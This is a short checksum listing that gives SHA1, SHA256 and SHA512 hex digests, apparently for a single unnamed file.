SHA1801262e122db6a2e758962896f260b55bbd0136a
SHA2569785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3
SHA5125c5ca5a497f39b07c7599194512a112b05bba8d9777bee1cb45bf610483edbffff5f9132fee3673e46cf58f2c3ba21af7df13c273a837a565323b82a7b50a4d8